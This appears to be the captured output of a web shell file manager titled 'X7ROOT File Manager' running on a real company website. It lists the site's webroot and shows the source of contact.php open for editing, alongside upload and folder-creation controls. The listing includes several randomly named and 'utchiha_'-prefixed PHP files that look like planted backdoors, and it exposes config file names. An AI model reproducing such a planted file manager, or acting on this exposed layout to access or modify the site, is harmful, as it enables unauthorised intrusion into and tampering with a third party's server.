X7ROOT File Manager
Current Path:
/var/www/vhosts/hwtw.com.tw/httpdocs
var
/
www
/
vhosts
/
hwtw.com.tw
/
httpdocs
/
📁
..
📄
.htaccess
(1.33 KB)
📁
.well-known
📄
aaaa.png
(22.58 KB)
📄
about.php
(4.23 KB)
📄
admin.php
(4.23 KB)
📁
backend
📄
changeLang.php
(117 B)
📄
config.inc.php
(1.72 KB)
📄
config.php
(0 B)
📄
contact.php
(1.7 KB)
📁
css
📄
favicon.ico
(596 B)
📄
hkktaxs.php
(4.92 KB)
📁
img
📁
include
📄
include.php
(5.71 KB)
📄
index.php
(15.09 KB)
📁
js
📁
lang
📁
libs
📁
origin
📄
ova.php
(0 B)
📄
product.php
(2.37 KB)
📄
product2.php
(2.38 KB)
📄
product3.php
(2.37 KB)
📄
product4.php
(3.12 KB)
📄
ptrxbqi.php
(4.92 KB)
📄
public_include.php
(549 B)
📄
robots.txt
(95 B)
📄
sitemap.xml
(1.54 KB)
📄
stpvxfe.php
(4.92 KB)
📄
support.php
(5.75 KB)
📁
update
📄
utchiha_3WBaUlWR.txt
(10 B)
📄
utchiha_GUO6J0cZ.php
(0 B)
📄
utchiha_N9omggk8.php
(8 KB)
📄
utchiha_P6GAYsRf.php
(0 B)
📄
utchiha_gO4TVdDZ.txt
(9 B)
📄
vzx.php
(37.04 KB)
📁
webfonts
📁
webimages
📄
zvewfpw.php
(4.92 KB)
Editing: contact.php
<?php require 'public_include.php'; $get_class = 4; ?> <!DOCTYPE html> <html> <head> <?php require 'include/meta.php'; ?> <body> <div style="overflow-x: hidden;"> <div id="header_div"> <div class="navbar" style="position: fixed; width: 100%;"> <?php require 'include/header.php'; ?> </div> </div> <div class="contact_title_div"> <div class="contact_title_div2"> <img src="img/about/about_title_icon.png" style="margin-right: 20px;"> <span><?=$arr_lang[$_COOKIE['lang']]['menu']['contact']?></span> </div> </div> <div id="contact"> <div class="container contact_main_div"> <div class="col-md-12 contact_main_content_div"> <p class="contact_info_title"> <?=$arr_lang[$_COOKIE['lang']]['contact']['content']?> </p> <p class="contact_info_phone"> <img src="img/contact/contact_tel_icon.png"> <span><?=$web_setting[0]['tel']?></span> </p> <p class="contact_info_mail"> <img src="img/contact/contact_mail_icon.png"> <span><?=$web_setting[0]['mail']?></span> </p> <p class="contact_info_add"> <img src="img/contact/contact_add_icon.png"> <span><?=$web_setting[0]['address_' . $_COOKIE['lang']]?></span> </p> </div> </div> </div> <?php require 'include/footer.php'; ?> </div> </body> </html>
Upload File
Create Folder